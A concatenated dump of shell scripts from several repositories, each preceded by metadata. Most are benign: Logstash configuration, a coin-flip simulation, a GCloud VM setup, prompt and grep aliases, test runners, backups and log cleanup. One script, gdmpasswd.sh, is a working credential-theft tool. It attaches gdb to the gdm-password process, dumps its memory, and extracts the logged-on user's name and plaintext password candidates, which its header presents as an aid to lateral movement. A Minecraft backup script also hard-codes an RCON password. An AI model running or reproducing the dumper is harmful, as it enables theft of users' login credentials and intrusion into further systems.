# Lumberjack input over SSL on port 5000 (uses the cert generated above).
cat > /etc/logstash/conf.d/01-lumberjack-input.conf <<'EOF'
input {
  lumberjack {
    port => 5000
    type => "logs"
    ssl_certificate => "/etc/pki/tls/certs/logstash-forwarder.crt"
    ssl_key => "/etc/pki/tls/private/logstash-forwarder.key"
  }
}
EOF
# Create filter for syslog messages
cat > /etc/logstash/conf.d/10-syslog.conf <<syslog_filter
filter {
  if [type] == "syslog" {
    grok {
      match => { "message" => "%{SYSLOGTIMESTAMP:syslog_timestamp} %{SYSLOGHOST:syslog_hostname} %{DATA:syslog_program}(?:\[%{POSINT:syslog_pid}\])?: %{GREEDYDATA:syslog_message}" }
      add_field => [ "received_at", "%{@timestamp}" ]
      add_field => [ "received_from", "%{host}" ]
    }
    syslog_pri { }
    date {
      match => [ "syslog_timestamp", "MMM d HH:mm:ss", "MMM dd HH:mm:ss" ]
    }
  }
}
syslog_filter
# Create filter for nginx messages.
cat > /etc/logstash/conf.d/11-nginx.conf <<end_of_logstash_nginx_configuration
filter {
  if [type] == "nginx-access" {
    grok {
      match => { "message" => "%{NGINXACCESS}" }
    }
  }
}
end_of_logstash_nginx_configuration
# Create filter for weblogic messages.
cat > /etc/logstash/conf.d/12-weblogic.conf <<end_of_weblogic_configuration
filter {
  ## WebLogic Server Http Access Log
  if [type] == "weblogic-access" {
    grok {
      match => [ "message", "%{IP:client} - - \[(?<timestamp>%{MONTHDAY}[./-]%{MONTH}[./-]%{YEAR}:%{TIME}\s+%{ISO8601_TIMEZONE})] \"%{WORD:verb} %{URIPATHPARAM:uri}\s+HTTP.+?\" %{NUMBER:status} %{NUMBER:response_time}" ]
    }
    date {
      match => [ "timestamp" , "dd/MMM/yyyy:HH:mm:ss Z" ]
    }
  }
}
end_of_weblogic_configuration
# Setup elastic search location
cat > /etc/logstash/conf.d/30-lumberjack-output.conf <<'EOF'
output {
  elasticsearch { host => localhost }
  stdout { codec => rubydebug }
}
EOF
sudo service logstash restart
d8cbcdae932282f5a1d90d91a100ad50d214f267 | Shell | DesarrollosEfx/redcpp | /ns-scripts/upload.sh | UTF-8 | 128 | 2.765625 | 3 | [
"MIT"
] | permissive | echo "Uploading:";
# Upload every built JS bundle; "$filename" is now quoted so names with
# spaces survive word-splitting (previously echo/ns received them split).
for filename in dist/*.js; do
    [ -e "$filename" ] || continue   # glob did not match anything
    echo "$filename"
    ns -u "$filename"
done
49b5b0d6675eede704b4eba716df377436b8017e | Shell | anshuljain21120/flip-combined-coin-simulation | /flipCoinCombination.sh | UTF-8 | 1,905 | 3.9375 | 4 | [] | no_license | #! /bin/bash -x
echo "Welcome to Flip Combined Coin Simulation!";
echo "This problem displays winning percentage of Head or Tail combination in a single, Doublet or Triplet";
# flip_a_coin — print "H" or "T" with equal probability (driven by $RANDOM).
function flip_a_coin()
{
    case $((RANDOM % 2)) in
        1) echo "H" ;;
        *) echo "T" ;;
    esac
}
# flip_combined_coin N — flip N coins and print the concatenated outcomes,
# e.g. "HTH" for N=3.
function flip_combined_coin()
{
    local count=$1
    local sequence=""
    local i
    for (( i = 0; i < count; i++ )); do
        sequence+="$( flip_a_coin )"
    done
    echo "$sequence"
}
# flip_coin_till DICT_NAME WIDTH [RUNS]
# Perform RUNS (default 10) combined flips of WIDTH coins, tallying each
# outcome into the caller's associative array (passed by name), then
# convert every tally to an integer percentage of RUNS.
# The array must be pre-seeded with all possible outcomes set to 0.
function flip_coin_till()
{
    local -n _dict=$1
    local combination=$2
    local limit=${3:-10}
    for (( counter=1; counter<=limit; counter++ ))
    do
        toss_result="$( flip_combined_coin "$combination" )"
        _dict["$toss_result"]=$(( ${_dict["$toss_result"]} + 1 ))
    done
    # Second pass: counts -> integer percentages.
    for key in "${!_dict[@]}"; do
        _dict[$key]=$(( (_dict[$key] * 100) / limit ))
    done
}
# get_max_value DICT_NAME — print the largest value stored in the named
# associative array (sentinel -999 is returned for an empty array).
function get_max_value()
{
    local -n _counts=$1
    local best=-999
    for key in "${!_counts[@]}"; do
        if [ "${_counts[$key]}" -gt "$best" ]; then
            best=${_counts[$key]}
        fi
    done
    echo "$best"
}
# max A B — print the numerically larger of two integers (B wins ties,
# matching the original else-branch).
function max()
{
    if [ "$1" -le "$2" ]; then
        echo "$2"
    else
        echo "$1"
    fi
}
# Run the simulation for 1-, 2- and 3-coin combinations. Each associative
# array is pre-seeded with every possible outcome so flip_coin_till can
# increment and then convert the counts to percentages.
declare -A singlet_toss_distribution;
singlet_toss_distribution=(["H"]=0 ["T"]=0 );
flip_coin_till singlet_toss_distribution 1;
declare -A doublet_toss_distribution;
doublet_toss_distribution=(["HH"]=0 ["HT"]=0 ["TH"]=0 ["TT"]=0 );
flip_coin_till doublet_toss_distribution 2;
declare -A triplet_toss_distribution;
triplet_toss_distribution=(["HHH"]=0 ["HHT"]=0 ["HTH"]=0 ["HTT"]=0 ["THH"]=0 ["THT"]=0 ["TTH"]=0 ["TTT"]=0 );
flip_coin_till triplet_toss_distribution 3;
# Fold the three per-table maxima into one overall winning percentage.
maximum_of_all=-999;
maximum_of_all=$( max "$(get_max_value singlet_toss_distribution)" "$maximum_of_all" );
maximum_of_all=$( max "$(get_max_value doublet_toss_distribution)" "$maximum_of_all" );
maximum_of_all=$( max "$(get_max_value triplet_toss_distribution)" "$maximum_of_all" );
echo "Winner of all three combination is value: $maximum_of_all";
2b546562597023ea758f5c9ddeb0d36055e0c153 | Shell | goraxe/dotfiles | /.bash_login | UTF-8 | 283 | 2.8125 | 3 | [] | no_license | # vim: ft=sh
# Clear any inherited agent pid before the terminal-specific setup runs.
SSH_AGENT_PID=""
# NOTE(review): the EXIT trap means this message also prints on normal
# logout, not just on Ctrl-C — confirm that is intended.
trap "echo No ^C here" INT TERM EXIT
# Source additional setup based on TERM; unknown terminals are logged.
if [[ -e ~/.bash_login.${TERM} ]]; then
	. ~/.bash_login.${TERM}
else
	now=`date +"%d-%m-%Y %H:%M"`
	echo "$now $TERM" >> ~/log/login.terms
fi
source .login
. "$HOME/.cargo/env"
| true |
01e60f9c073c9a4440557eecd82d96d7ca4be69f | Shell | myx/myx.distro-prepare | /source-process/builders/2211-project-source.sh | UTF-8 | 719 | 3.515625 | 4 | [
"BSD-3-Clause"
] | permissive | Require ListChangedSourceProjects
Require ListProjectProvides
# MakeProjectSourceArchive PROJECT
# Packs $MDSC_SOURCE/<project> into $MDSC_OUTPUT/<project>/project-source.tgz.
# A leading "$MMDAPP/source/" prefix on the argument is stripped first.
# Exits the whole script when no project name remains after stripping.
MakeProjectSourceArchive(){
	local PKG="${1#$MMDAPP/source/}"
	[ -n "$PKG" ] || {
		echo "MakeProjectSourceArchive: 'PKG' argument is required!" >&2
		exit 1
	}
	local sourceDir="$MDSC_SOURCE/$PKG"
	local outputDir="$MDSC_OUTPUT/$PKG"
	local parentDir="$(dirname "$sourceDir")"
	local packName="$(basename "$sourceDir")"
	mkdir -p "$outputDir"
	# Archive the project directory itself (not just its contents).
	tar -zcv -C "$parentDir" -f "$outputDir/project-source.tgz" "$packName"
}
# For every changed project that declares the "project-source.tgz"
# source-process provide, build its archive asynchronously (Async /
# Require helpers come from the surrounding myx.distro tooling); the
# immediate `wait` serializes the jobs one at a time.
for PKG in $( ListChangedSourceProjects ) ; do
	if test ! -z "$( ListProjectProvides "$PKG" "source-process" | grep -e "^project-source.tgz$" )" ; then
		Async "`basename "$PKG"`" MakeProjectSourceArchive "$PKG"
		wait
	fi
done
| true |
e08c203f6e49bc0643a9ab67dab538057d802086 | Shell | maxnz/gcloud-openmp-setup | /setup.bash | UTF-8 | 7,226 | 3.734375 | 4 | [] | no_license | #/bin/bash
# Zones already tried (space-separated) and how many, capped at 20 tries.
USED_ZONES=
NUMUSEDZONES=0
# Project currently configured in gcloud, used as the default.
OLD_PROJECT=`gcloud config list project 2> /dev/null | grep "project = " | cut -d ' ' -f 3`
PROJECT=
PREFIX='openmp-'	# Must start with a letter
VMCORES=8	# default VM size; overridable with -c
re_num='^[0-9]+$'	# "is a non-negative integer" check for -c
QUIET=0	# 1 = skip interactive confirmation
# Ask user for the project they want to use
# ask_project — prompt for a project id on stdin; an empty answer keeps the
# currently configured project ($OLD_PROJECT). Delegates to set_project
# (defined in common.bash).
ask_project() {
    echo -n "Project Name (leave blank to use current project $OLD_PROJECT): "
    read project
    if [[ -z $project ]]; then
        set_project $OLD_PROJECT
    else
        set_project $project
    fi
}
# Get a random zone from zones.txt
# get_rand_zone — pick a random, not-yet-tried zone from zones.txt and
# verify its *region* has at least $VMCORES free CPUs in quota. Sets the
# globals ZONE (full zone name) and USED_ZONES. Recurses until a suitable
# zone is found; gives up after 20 distinct zones.
get_rand_zone() {
	if [[ $NUMUSEDZONES == 20 ]]
	then
		echo "No remaining zones"
		exit 1
	fi
	# Random 1-based line index into zones.txt.
	z=$RANDOM
	numzones=`wc zones.txt -l | cut -d ' ' -f 1`
	let "z %= $numzones"
	let "z++"
	ZONE=`sed "${z}q;d" zones.txt`
	# First two dash-separated fields form the region, e.g.
	# "us-central1-a" -> "us-central1".
	zonec=`echo $ZONE | cut -d '-' -f 1`
	zonel=`echo $ZONE | cut -d '-' -f 2`
	zone="${zonec}-${zonel}"
	# NOTE(review): the membership test greps for the *region*, so one
	# rejected region rules out all of its zones — confirm intended.
	echo $USED_ZONES | grep $zone &> /dev/null
	if [[ $? == 0 ]]
	then
		get_rand_zone
	else
		USED_ZONES="$USED_ZONES $ZONE"
		let "NUMUSEDZONES++"
		touch quotas.temp
		gcloud compute regions describe $zone > quotas.temp
		# Scan the YAML-ish output for the CPUS quota block: the line
		# after "limit:" names the metric, the one after that holds usage.
		LINES=`wc quotas.temp -l | cut -d ' ' -f 1`
		for ((i=1;i<=LINES;i++))
		do
			LINE=`sed "${i}q;d" quotas.temp`
			echo $LINE | grep "limit:" &> /dev/null
			if [[ $? == 0 ]]
			then
				sed "$(($i+1))q;d" quotas.temp | grep "CPUS" &> /dev/null
				if [[ $? == 0 ]]
				then
					REGCPUUSAGE=`sed "$(($i+2))q;d" quotas.temp | sed 's/ \+/ /g' | cut -d ' ' -f 3 | cut -d '.' -f 1`
					REGCPUQUOTA=`sed "${i}q;d" quotas.temp | sed 's/ \+/ /g' | cut -d ' ' -f 3 | cut -d '.' -f 1`
					let "REGREMCPUS = $REGCPUQUOTA - $REGCPUUSAGE"
					if [ $REGREMCPUS -lt $VMCORES ]
					then
						echo "Not enough CPUs remaining in region quota: $REGREMCPUS remaining in $zone"
						get_rand_zone
					fi
					break
				fi
			fi
		done
		rm quotas.temp
	fi
}
# get_quota — abort the script (exit 1) if the project-wide
# CPUS_ALL_REGIONS quota does not leave at least $VMCORES CPUs free.
# Same line-scanning approach as get_rand_zone: for each "limit:" line,
# the next line names the metric and the one after holds current usage.
get_quota() {
	touch quotas.temp
	gcloud compute project-info describe --project $PROJECT > quotas.temp
	LINES=`wc quotas.temp -l | cut -d ' ' -f 1`
	for ((i=1;i<=LINES;i++))
	do
		LINE=`sed "${i}q;d" quotas.temp`
		echo $LINE | grep "limit:" &> /dev/null
		if [[ $? == 0 ]]
		then
			sed "$(($i+1))q;d" quotas.temp | grep "CPUS_ALL_REGIONS" &> /dev/null
			if [[ $? == 0 ]]
			then
				# Strip the decimal part of the quota numbers.
				CPUUSAGE=`sed "$(($i+2))q;d" quotas.temp | sed 's/ \+/ /g' | cut -d ' ' -f 3 | cut -d '.' -f 1`
				CPUQUOTA=`sed "${i}q;d" quotas.temp | sed 's/ \+/ /g' | cut -d ' ' -f 3 | cut -d '.' -f 1`
				let "REMCPUS = $CPUQUOTA - $CPUUSAGE"
				if [ $REMCPUS -lt $VMCORES ]
				then
					echo "Not enough CPUs remaining in quota: $REMCPUS remaining"
					rm quotas.temp
					exit 1
				fi
				break
			fi
		fi
	done
	rm quotas.temp
}
# confirm_opts — pick the first free VM name "$PREFIX<n>" by probing the
# existing instance list, print the chosen configuration, and (unless
# QUIET=1) ask the user to confirm. Only a leading n/N aborts.
confirm_opts() {
	INSTANCES=`gcloud compute instances list 2> /dev/null`
	for ((i=0;;i++))
	do
		# Trailing space anchors the name so "openmp-1" doesn't match "openmp-10".
		echo $INSTANCES | grep "$PREFIX$i " &> /dev/null
		if [[ $? != 0 ]]
		then
			NAME="$PREFIX$i"
			break
		fi
	done
	echo
	echo "Configuration:"
	echo "Project: $PROJECT"
	echo "VM Size: $VMCORES Cores"
	echo "VM Name: $NAME"
	if [[ $QUIET == 1 ]]; then return; fi;
	echo -n "Continue? (Y/n): "
	read con
	con=`echo $con | head -c1`
	if [[ $con == 'n' || $con == 'N' ]]
	then
		echo "Abort"
		# NOTE(review): `exit -1` becomes status 255 — confirm intended.
		exit -1
	fi
}
# Set up VM
# create_vm — create the Debian 9 VM, retrying in a fresh random zone on
# any failure. Relies on get_rand_zone to set $ZONE and to abort the
# whole script once all zones are exhausted.
create_vm() {
	echo "Creating VM"
	while true
	do
		get_rand_zone
		gcloud compute instances create \
			--machine-type=n1-standard-$VMCORES --image-family=debian-9 \
			--image-project=debian-cloud --zone $ZONE $NAME > /dev/null
		RET=$?
		if [[ $RET != 0 ]]
		then
			echo "Exception while creating VM. Retrying."
			continue
		fi
		break
	done
}
# Configure the VM
# config_vm — provision the freshly created VM over SSH: install build
# tools, unpack CSinParallel into /etc/skel (so every new account gets a
# copy), and pre-create the skeleton .ssh directory.
config_vm() {
	gcloud compute ssh $NAME --zone $ZONE --command \
		"sudo apt install g++ make -y; \
		cd /etc/skel; \
		sudo wget http://csinparallel.cs.stolaf.edu/CSinParallel.tar.gz; \
		sudo tar -xf CSinParallel.tar.gz && sudo rm CSinParallel.tar.gz; \
		sudo cp -r /etc/skel/CSinParallel ~; \
		sudo chmod -R 777 ~/CSinParallel; \
		sudo mkdir /etc/skel/.ssh; \
		sudo touch /etc/skel/.ssh/authorized_keys"
}
source "./common.bash"
while test $# -gt 0
do
case "$1" in
-h|--help)
echo "GCloud OpenMP VM Setup Script"
echo
echo "Options:"
echo "-h, --help show this help message"
echo "-p, --project ID set the project to use (ID = full project id)"
echo
echo "-q, --quiet run the script with default options (unless specified otherwise):"
echo " 8 cores"
echo
echo " --prefix specify the prefix to use when naming the VM (must start with a letter)"
echo " the script will add a -# when naming the VM"
echo "-c [1|2|4|8|16|32|64|96]"
echo " set the number of cores in the VM"
echo " default=8"
exit -1
;;
-q|--quiet)
shift
if [[ $PROJECT == "" ]]; then PROJECT=$OLD_PROJECT; fi;
QUIET=1
;;
-c)
shift
if test $# -gt 0
then
VMCORES=$1
if ! [[ $VMCORES =~ $re_num ]]
then
invalid_argument $VMCORES "-c"
fi
if ! [[ $VMCORES == 1 || $VMCORES == 2 || $VMCORES == 4 || $VMCORES == 8 || \
$VMCORES == 16 || $VMCORES == 32 || $VMCORES == 64 || $VMCORES == 96 ]]
then
invalid_argument $VMCORES "-c"
fi
shift
else
missing_argument "-c"
fi
;;
-p|--project)
shift
if test $# -gt 0
then
set_project $1
shift
else
missing_argument "-p|--project"
fi
;;
--prefix)
shift
if test $# -gt 0
then
PREFIX="$1-"
shift
else
missing_argument "--prefix"
fi
;;
*)
echo "Unrecognized flag $1"
exit 1
;;
esac
done
# No project chosen via -p/-q: ask interactively.
if [[ $PROJECT == "" ]]
then
	ask_project
fi
# Main sequence: verify quota, confirm, create, then configure the VM.
get_quota
confirm_opts
create_vm
# Refresh ~/.ssh/config entries so config_vm's ssh call can connect.
gcloud compute config-ssh &> /dev/null
config_vm
# Restore the user's originally configured gcloud project.
if [[ $PROJECT != $OLD_PROJECT ]]
then
	set_project $OLD_PROJECT
fi
| true |
540e318862d3c64db6330ffbd504a0813b2e8a59 | Shell | morristech/dotfiles-52 | /.config/bashrc.d/prompt.bash | UTF-8 | 2,064 | 3.5 | 4 | [] | no_license | # shellcheck disable=SC2034
#########################
# git setup
#########################
# source git's ps1 script; "$_" expands to the last argument of the
# preceding test, i.e. the git-prompt.sh path itself.
# shellcheck source=/usr/local/etc/bash_completion.d/git-prompt.sh
test -r "$HOMEBREW_PREFIX"/etc/bash_completion.d/git-prompt.sh && source "$_"
# display working directory state (* for modified/+ for staged)
GIT_PS1_SHOWDIRTYSTATE=true
# display stashed state ($ if there are stashed files)
GIT_PS1_SHOWSTASHSTATE=true
# display HEAD vs upstream state
GIT_PS1_SHOWUPSTREAM="auto"
# use colors
GIT_PS1_SHOWCOLORHINTS=true
# detached-head description
GIT_PS1_DESCRIBE_STYLE=branch
#########################
# colors (solarized)
#########################
# __colorbit indexes the color-code pairs below: 0 (test succeeded) picks
# the 256-color value, 1 falls back to the 16-color value.
test "$(tput colors)" -ge 256
__colorbit=$?
# __color NAME... — emit prompt-safe escape sequences for each argument.
# Solarized color names map to a (256-color, 16-color) pair selected by
# $__colorbit; attribute names map to tput capabilities; anything else is
# passed through literally. Output is wrapped in \[...\] so bash does not
# count the escapes toward the prompt width.
__color() {
	while [ $# -gt 0 ]; do
		local -a code=()
		local control='' special=''
		case "$1" in
			base0) code=(244 12) ;;
			base1) code=(245 14) ;;
			base2) code=(254 7) ;;
			base3) code=(230 15) ;;
			base00) code=(241 11) ;;
			base01) code=(240 10) ;;
			base02) code=(235 0) ;;
			base03) code=(234 8) ;;
			yellow) code=(136 3) ;;
			orange) code=(166 9) ;;
			red) code=(160 1) ;;
			magenta) code=(125 5) ;;
			violet) code=(61 13) ;;
			blue) code=(33 4) ;;
			cyan) code=(37 6) ;;
			green) code=(64 2) ;;
			reset) control=sgr0;;
			reverse) control=rev;;
			underline) control=smul;;
			bold | dim | smul | rmul | rev | smso | rmso ) control=$1;;
			*) printf "%s" "$1"; shift; continue;;
		esac
		shift
		if [ -n "$control" ]; then
			special=$(tput "$control")
		elif [ -n "${code[*]}" ]; then
			special=$(tput setaf "${code[$__colorbit]}")
		fi
		printf "\\[%s\\]" "$special"
	done
}
# __ps1 — build the prompt string: nodenv/rbenv versions, cwd, git branch
# with upstream name, then "$ " colored by the previous command's status
# (must read $? first, before any command clobbers it).
__ps1() {
	local prior_status=$?
	__nodenv_ps1 "$(__color yellow)[%s] "
	__rbenv_ps1 "$(__color red)[%s] "
	__color cyan '\w' # CWD
	__git_ps1 "$(__color base2) (%s $(git rev-parse --abbrev-ref '@{u}' 2>/dev/null))"
	__color "$(if [ $prior_status -eq 0 ]; then echo base2; else echo red; fi)" "\\n\\$ "
	__color reset
}
# Recompute PS1 before every prompt, preserving any existing hook.
PROMPT_COMMAND='PS1=$(__ps1); '$PROMPT_COMMAND
| true |
446cf018220af22e2d12320468cf7d949e394e15 | Shell | TiagoZhang/docker-redmine | /redmine.sh | UTF-8 | 475 | 3.015625 | 3 | [] | no_license | #!/bin/bash
# Seed a .env from the sample on first run, then load it.
if [[ ! -e .env ]]; then
	cp sample.env .env
fi
source .env
# RM_VERSION is mandatory; branch and directory default from it.
: ${RM_VERSION?"need to set redmine version RM_VERSION, see README.md"}
: ${RM_BRANCH=$RM_VERSION-stable}
: ${RM_DIR=$RM_BRANCH}
# Initialize once per environment: development is detected via its SQLite
# database, production via a .production marker file.
# NOTE(review): Rails' default dev db is development.sqlite3 — confirm
# this path is correct for this setup.
if [[ ! -v RAILS_ENV || "$RAILS_ENV" == development ]]; then
	if [[ ! -e $RM_DIR/db/development.sqlite ]]; then
		scripts/initialize.sh
	fi
else
	if [[ "$RAILS_ENV" == production && ! -e .production ]]; then
		scripts/initialize.sh
	fi
fi
scripts/redmine.sh
| true |
e669cd199040757e6556fd7fd8dc205679100ccb | Shell | mobidic/nenufaar | /tests/nenufaar_annot_test.sh | UTF-8 | 2,593 | 3.59375 | 4 | [] | no_license | #/bin/bash
USAGE="
sh tests/nenufaar_annot_test.sh -v version_number - launch from nenufaar folder
"
if [ "$#" -eq 0 ]; then
	echo "${USAGE}"
	echo "Error Message : No arguments provided"
	echo ""
	exit 1
fi
# Argument parsing: only -v/--version carries a value; -h prints usage.
while [[ "$#" -gt 0 ]]
do
	KEY="$1"
	case "${KEY}" in
	-v|--version)	#mandatory
		VERSION="$2"
		shift
		;;
	-h|--help)
		echo "${USAGE}"
		exit 1
		;;
	*)
		echo "Error Message : Unknown option ${KEY}" # unknown option
		exit
		;;
	esac
	shift
done

SUMMARY="tests/logs/nenufaar_annot/${VERSION}/SUMMARY.log"
# -p: do not fail when the directories already exist (re-runs).
mkdir -p "tests/logs/nenufaar_annot/${VERSION}/"
mkdir -p "tests/vcf/${VERSION}/"
# Truncate the summary once per run; every result below appends.
: > "${SUMMARY}"

# run_test LABEL LOGFILE EXTRA_ARGS...
# Run one nenufaar_annot.sh invocation and append a one-line OK / NOT OK
# verdict to the summary. (Bug fix: failures previously used ">" and
# overwrote the whole summary instead of appending; one failure message
# also pointed at "test/logs" instead of "tests/logs".)
run_test() {
	local LABEL="$1"
	local LOG="$2"
	shift 2
	bash nenufaar_annot.sh -i input/tests/MiniFastq_vcf/ -o "tests/vcf/${VERSION}/" "$@" -log "${LOG}"
	local STATUS=$?
	if [ "${STATUS}" -eq 0 ];then
		echo "Test ${LABEL} OK on ${HOSTNAME}" >> "${SUMMARY}"
	else
		echo "Test ${LABEL} NOT OK on ${HOSTNAME} - check: tail -30 ${LOG}" >> "${SUMMARY}"
	fi
}

run_test "annovar hg19" "tests/logs/nenufaar_annot/${VERSION}/${VERSION}.hg19.annovar.log" -a annovar -g hg19
run_test "annovar hg38" "tests/logs/nenufaar_annot/${VERSION}/${VERSION}.hg38.annovar.log" -a annovar -g hg38
run_test "annovar hg19-filtered" "tests/logs/nenufaar_annot/${VERSION}/${VERSION}.hg19.filtered.annovar.log" -a annovar -f true -g hg19
run_test "merge hg19" "tests/logs/nenufaar_annot/${VERSION}/${VERSION}.hg19.merge.log" -a merge -g hg19
exit
| true |
69847a0532df0131ec1674466c4b8e240e1caac4 | Shell | collielimabean/CS640-P5 | /part1Helpers/searchJSON.sh | UTF-8 | 291 | 3.4375 | 3 | [] | no_license | #!/bin/bash
if [ $# -eq 0 ]
then
	echo "Usage: ./searchJSON <ip address> (optional)<verbose>"
	exit
fi
ip=$1
verbose=$2
# Unpredictable temp file instead of a fixed tmp.txt in the CWD.
tmpfile=$(mktemp) || exit 1
# Keep only the EC2 prefixes, then search those for the requested address.
jq '.prefixes[] | select((.service=="EC2"))' < ip-ranges.json > "$tmpfile"
# -F: match the address literally (previously the dots were regex
# wildcards and could match unrelated prefixes).
if [ -n "$verbose" ]
then
	# -B/-A show the surrounding JSON fields of each match.
	grep -F -- "$ip" -B 1 -A 3 "$tmpfile"
else
	grep -F -- "$ip" "$tmpfile"
fi
rm "$tmpfile"
| true |
539be01b027879cb7b1041b9bef8f6c4d0208906 | Shell | bioe007/config-bash | /lib/grep.sh | UTF-8 | 457 | 3.203125 | 3 | [] | no_license | #!/bin/bash
# grep wrapper aliases: colorized output plus a shared set of
# build-artifact and VCS excludes.
OPTS="--color=always"

# File glob patterns grep should skip.
FILES=(
    '*.o'
    '*.pyc'
    'tags'
    '*.out'
    '*.git'
    '*.zip'
)

# Directory glob patterns grep should skip when recursing.
DIRS=(
    '*.svn'
    '*.git'
)

# Turn the pattern lists into --exclude / --exclude-dir option strings.
EXF=""
for pattern in "${FILES[@]}"; do
    EXF+="--exclude=$pattern "
done

EXD=""
for pattern in "${DIRS[@]}"; do
    EXD+="--exclude-dir=$pattern "
done

G_OPTS="$OPTS $EXF $EXD"

alias g="grep $G_OPTS"
alias gi="grep -i $G_OPTS"   # case-insensitive
alias gn="grep -n $G_OPTS"   # with line numbers
alias gr="grep -r $G_OPTS"   # recursive
alias gw="grep -w $G_OPTS"   # whole-word
| true |
a1c8feadc1dbcf2e152f1a8889490973ba6c5feb | Shell | HomeLabKB/KnowledgeBase | /Unsorted/Configuration/Minecraft/Files/backup.sh | UTF-8 | 330 | 2.84375 | 3 | [] | no_license | #!/bin/bash
# rcon CMD — send one console command to the local Minecraft server via
# mcrcon (RCON on 127.0.0.1:25575).
# NOTE(review): the RCON password ("test") is hard-coded on the command
# line (visible in ps) — consider reading it from a protected file.
rcon() {
	local cmd=$1
	/opt/minecraft/tools/mcrcon/mcrcon -H 127.0.0.1 -P 25575 -p test "$cmd"
}
# Pause autosave, force a full save, archive the world, then resume.
rcon "save-off"
rcon "save-all"
tar -cvpzf /opt/minecraft/backups/server-$(date +%F_%R).tar.gz /opt/minecraft/server
rcon "save-on"
## Delete older backups (anything past 7 days).
find /opt/minecraft/backups/ -type f -mtime +7 -name '*.gz' -delete
| true |
1a17a8d8e94c8834f28162d124fc0d7529c50121 | Shell | johnjohnsp1/gdmpasswd | /gdmpasswd.sh | UTF-8 | 1,445 | 3.484375 | 3 | [] | no_license | #!/bin/bash
# gdm3 3.26.2.1-3 (and possibly later) stores the credentials of the logged on user in plaintext in memory.
# Useful for lateral movement; we're on a box, but we don't yet have any credentials...
# This script requires root or privileged access to gdb/gcore/ptrace, etc.
cat << "EOF"
 __ __
.-----.--| |.--------.-----.---.-.-----.-----.--.--.--.--| |
| _ | _ || | _ | _ |__ --|__ --| | | | _ |
|___ |_____||__|__|__| __|___._|_____|_____|________|_____|
|_____| @secure_mode |__|
EOF
# check ptrace_scope: Yama value 3 forbids ptrace entirely, so bail early.
ptrace_scope=$(cat /proc/sys/kernel/yama/ptrace_scope)
if [ "$ptrace_scope" -eq "3" ]; then
	echo -e "\nUse of ptrace appears to be restricted due to /proc/sys/kernel/yama/ptrace_scope being set to $ptrace_scope. This won't work.";
	exit 1;
fi
gdb=$(which gdb)
strings=$(which strings)
# gdb batch script (expected in the CWD) that dumps the process core.
commands="commands.txt"
gdmpassword_pid=$(ps aux |grep 'gdm-password' |grep -v grep |awk '{print $2}')
# Attach to gdm-password, dump its memory, then mine the strings output.
$gdb -p $gdmpassword_pid -x $commands --batch-silent 2>/dev/null
$strings /tmp/core_file > /tmp/core_strings
# Username: second path component of the HOME= environment string.
account=$(grep 'HOME=' /tmp/core_strings |cut -f2 -d"/")
# Password candidates: strings found near NSS markers in memory
# (heuristic; several candidates are printed).
password=$(grep -E -C2 "myhostname|protocols" /tmp/core_strings |grep -v '\-\-')
echo -e 'USERNAME:' $account '\n\nPASSWORD CANDIDATES:\n'
echo $password\ | tr " " "\n"
rm /tmp/core_strings && rm /tmp/core_file
| true |
6306572f7366af12ed972c554b4925dd48aed5cb | Shell | yanyov/lxd-ansible | /playbooks/roles/elasticsearch/templates/elasticsearch-cron.j2 | UTF-8 | 695 | 3.71875 | 4 | [] | no_license | #!/bin/bash
set -o nounset
set -o errexit
set -o pipefail
# below code depends on the ElasticSearch log folder being the CWD
cd /var/log/elasticsearch
# Compare the dated log names still inside the retention window against
# everything present; `comm -13` prints the names only in the second
# list, i.e. files older than {{ es_log_files_retention_days }} days.
log_files_to_delete=$(comm -13 <(for i in {01..{{ es_log_files_retention_days }}}; do echo {{ es_clustername }}.log.$(date -d "now - ${i}days" "+%Y-%m-%d")*; done | sort) <(ls -1 | grep {{ es_clustername }}.log.20 | sort))
# Bug fix: the variable must be quoted — unquoted, a multi-file result
# word-split into `[ -z w1 w2 ... ]`, which errors and (under errexit)
# killed the script exactly when there was something to delete.
if [ -z "$log_files_to_delete" ]; then
	echo "no elasticsearch log files to delete. Exit"
	exit 0
fi
# Unquoted on purpose: word-splitting feeds one file name per argument.
echo $log_files_to_delete | xargs rm -v
| true |
e13219127d57ee8b43ac702310b6da8f7e37884d | Shell | mgrad/tinytools | /remove-col.sh | UTF-8 | 554 | 3.875 | 4 | [] | no_license | #!/bin/bash
# Print a short usage summary (three lines) on stdout.
function usage {
    printf '%s\n' \
        "usage: $0 file columns_list" \
        "example: ./$0 1 3 5 file" \
        "example: cat file | ./$0 1 3 5 - "
}
# No arguments at all -> show usage and bail.
if [ "$#" -eq 0 ]; then usage ; exit 1; fi
# Last argument is the input file ("-" means stdin for awk); everything
# before it is the list of column numbers to blank out.
INPUTFILE=${!#}
length=$(($#-1))
cols=()
if [ "$length" -gt 0 ]; then
	cols=("${@:1:$length}")
fi
# Build the awk program "$1="";$3="";...". Column arguments are validated
# as plain integers first — previously they were eval'd unchecked, which
# allowed arbitrary shell command injection via the argument list.
COLS=""
for i in "${cols[@]}"; do
	case $i in
		''|*[!0-9]*)
			echo "ERROR: invalid column number '$i'" >&2
			usage; exit 1 ;;
	esac
	COLS="${COLS}\$${i}=\"\";"
done
# "{...}1": blank the selected fields, then print every record.
awk "{${COLS}}1" "$INPUTFILE" | column -t
| true |
6150c662ccfd8222adfabee4e3db4ba2fe7125a0 | Shell | GoogleCloudPlatform/gcsfuse | /perfmetrics/scripts/ml_tests/smart_log_deleter.sh | UTF-8 | 402 | 3.828125 | 4 | [
"Apache-2.0"
] | permissive | #!/bin/bash
# Script for deleting older log files in the folder
# Usage: ./smart_log_deleter.sh $FOLDER_NAME
# Deletes the oldest files until fewer than three remain. Relies on
# `ls -tr` output, so log file names must not contain whitespace.
num_logs=$(ls "$1" | wc -w)
echo "$num_logs"
if [ "$num_logs" -lt 3 ]
then
	exit 0
fi
# Oldest first, so the newest files survive.
logs_list=$(ls -tr "$1")
for log_file in $logs_list; do
	num_logs=$((num_logs - 1))
	rm -f "$1/$log_file"
	if [ "$num_logs" -lt 3 ]
	then
		exit 0
	fi
done
| true |
affbb49adf73bed1b21c5cb8e2c18e3f32cc878c | Shell | cilium/cilium | /test/controlplane/services/graceful-termination/generate.sh | UTF-8 | 2,035 | 3.671875 | 4 | [
"Apache-2.0",
"BSD-3-Clause",
"GPL-1.0-or-later",
"GPL-2.0-only",
"BSD-2-Clause"
] | permissive | #!/usr/bin/env bash
#
# Generate the golden test files for the graceful termination test
#
# This generates the following files:
# init.yaml: The initial state of the cluster
# state1.yaml: Initial creation of the services and endpoints
# state2.yaml: Endpoint is set to terminating state
# state3.yaml: Endpoint has been removed
